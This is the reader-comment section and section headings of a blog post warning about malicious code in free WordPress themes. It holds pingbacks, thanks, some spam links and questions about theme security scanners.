Pingback: Free or Paid Theme: Should I Get a Free Theme? NO! | Wordpress Noobies
Pingback: - ThreatResearcher ... a blog
Reply

Nice weblog here! Additionally your web site a lot up fast! What web host are you the usage of? Can I get your affiliate link on your host? I desire my website loaded up as quickly as yours lol

reklam January 24, 2012 at 1:59 pm
Pingback: We Need A Theme! | ALBC Testing Grouds
Reply

Yes.You are right,I always check with plugin when i install new free wordpress theme for my blog.

Mohan January 26, 2012 at 11:17 am
Pingback: Friday Featured Posts About Blogging & Social Media - Simply Stacie
Pingback: Keep Calm and Carry On: How To Handle 4 Common WordPress Emergencies
Pingback: Choosing a Wordpress theme: What your web site can look like - Your Online Visibility || Your Online Visibility
Reply

Do not trust TAC : http://www.boiteaweb.fr/security-plugin-review-tac-theme-authenticity-checker-3149.html (french post sorry)

BoiteAWeb February 4, 2012 at 3:23 pm
Pingback: More Themes | wordpressonlineinaday.com
Pingback: Gevonden (weekly) « Anybody seen my
Pingback: Blog Design On A Budget: The Complete Guide For Creating A Beautiful, High Converting Blog
Reply

WordPress sucks. learn how to progrm

steven February 10, 2012 at 6:59 pm
- Reply
  
  Obviously over 22% (and growing daily) of all of the website owners and corporations in the world including (just to name a few) CNN, Yahoo, Harvard, NASA, FOX, The New York Times, Flickr, Rolling Stone, Meebo, C|net, Le Monde, Nancy Pelosi, Rosie O’Donnell, Stephen Colbert, Anousheh Ansari, Stanford, MIT, Second Life, Xerox, The US Post Office, Ford Motors….disagree with you.
  
  They aren’t using “programmers” they are using WordPress Developers. You need to add some skills to your resume my friend. The web is passing you by.
  
  Harold Mansfield February 10, 2012 at 7:08 pm
Pingback: What Are Themes, Frameworks, and Plugins? | The High-Tech Coach
Reply

Thank you for all the effort you’ve put into the investigation and the article, even though I just found it now. I was aware of all those things prior to reading your article, but I was doing all the checking for base64 and unwanted links by hand. Thanks to you, I found about TAC and I just ran all the free themes I’m using for the sites I run or manage through it. It saves a lot of time and effort! Thankfully, I have developed my own theme for my personal website, so no need to worry about it :) I would recommend that to everybody who has the knowledge and skill, and of course – the time!
Thank you again for pointing that great plugin put for me :)

Rositsa Zaharieva February 21, 2012 at 6:03 am
- Reply
  
  This has great information for learning. A new online magazine FLORIDA STANDARD has been published. It has all content of our life style and also have up-to-date event & information that can increase our knowledge. Here’s the link- I think this magazine will helpful for you.
  
  http://www.TheFloridaStandard.com
  
  Atikur Rahman March 9, 2012 at 5:18 am
Reply

very interesting article. I think i need to check every thing one’s again, Thanks for your information, keep writing. http://www.couponcodesindia.com/diythemes.com/

shaheda m February 25, 2012 at 6:17 am
Reply

hello, i just wanna ask if you could provide a code that will trim and show only the text beetween theText Here .. also, a code that will show the text which has a beginning of a word ‘Price’

e.g: post text… Price: $23.99…text text…

the output will be, $23.99

thanks in advance, cheers!

symplySpread March 21, 2012 at 2:28 am
Reply

hallo:)
I have just started up my own website, and until now, I have only installed plugins (Antivirus,BPS,Exploit scanner,secure wordpress, TAC and WP-malwatch) to secure my site.when I scan with exploit scanner it shows me 16 level severes? ex. located from plugin: antivirus and wp-malwatch an secure wordpress. in this it shows base64 and eval.. how can that be possible? Are these plugins not secure to use?
Hope someone can help me:)

Frederik Hammershøj March 27, 2012 at 6:18 am
Reply

Summer 2 Launch Sale! BOGO 50% Off Girl’s Dresses & Skirts or Boy’s Fashion Shorts
http://www.discountsguide.com/naartjiekids-com-discount-codes-3467658.html

Sharon Guo April 13, 2012 at 9:28 pm
Reply

Wow, and this is why you do NOT hunt down for free wordpress themes on Google.

Hope more people actually knew how much they are compromising their server’s security but people seem to not care.

Sergio

Sergio Félix April 16, 2012 at 8:13 pm
Reply

This valuable information came at just the right time! I have 2 questions….first, I tried to duplicate what you did and I was never able to get the encrypted code I found using TAC and Otto’s decocer to decode into anything intelligible. I can’t figure out how to select out the proper snippit I think.
Second and most important…I have a site with a free theme and I found a lot of embedded base64 code. If I install a clean theme, will my site then go on to recover from the SEO damage done?

Carolyn Blake April 19, 2012 at 4:23 am
Reply

woot … i didn’t know the history behind it … i have uploaded a free theme in http://thetrafficbus.com/ can i also get these kind of problems …?

deepak sharma April 24, 2012 at 8:48 am
Reply

WOW!! This article is really full of great info.

Thank you for all of your time searching.

DJ Perez May 11, 2012 at 8:06 pm
Reply

I just found your site with this page. Absotely loved it. Bookmarking it right away.

Great insights into the search term. I’ll be sure to watch out for these now. Thanks a lot

Kevin Kibiego May 12, 2012 at 4:35 am
Reply

Nice work with all the detail.

But who doesn’t already know this information.

None of this is malicious nor harmful, you just hated on some websites because its trendy to diss free WP themes.

Sean Doyle May 14, 2012 at 6:46 am
Reply

Remove Text Enhance

http://botcrawl.com/how-to-remove-text-enhance/

Chris Williams May 14, 2012 at 6:48 am

Click on a tab to select how you'd like to leave your comment

Twitter
Facebook
Google

1. WordPressThemesBase

The Verdict:

My suggestion:

2. Free WordPress Themes

The Verdict

My Suggestion

3. Themes2WP

The Verdict

My suggestion

4. FreeWPThemes

The Verdict

My suggestion

5. WordPress.org

The Verdict

My suggestion

6. Themes.Rock Kitty

The Verdict

My suggestion

7. WP Themes Depot

The Verdict

My suggestion

8. WPRex

The Verdict

My suggestion

9. No Limits Web Design

The Verdict

My suggestion

10. Templates Browser

The Verdict

My suggestion

Conclusion

Free Themes

Premium Sites with some Free WordPress Themes

Decoders

Useful Plugins

Further Reading

Featured Plugin - Easily integrate your WordPress site with Facebook

Featured Plugin - Add bottom corner (or anywhere else) chat to your site

Featured Plugin - Host sites, get paid, just like WordPress.com

Featured Plugin - Open an Online Store with MarketPress

Featured Plugin - Start your own Quora / StackOverflow / Yahoo Q&A site

Featured Plugin - Start Your Own Powerful Membership Site

Featured Plugin - WordPress + Google Maps = Perfect

Featured Plugin - Send beautiful html email newsletters, from WordPress!

Featured Plugin - Turn any WordPress page into a fully featured wiki!

523 Responses to Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else

Leave a Reply Cancel reply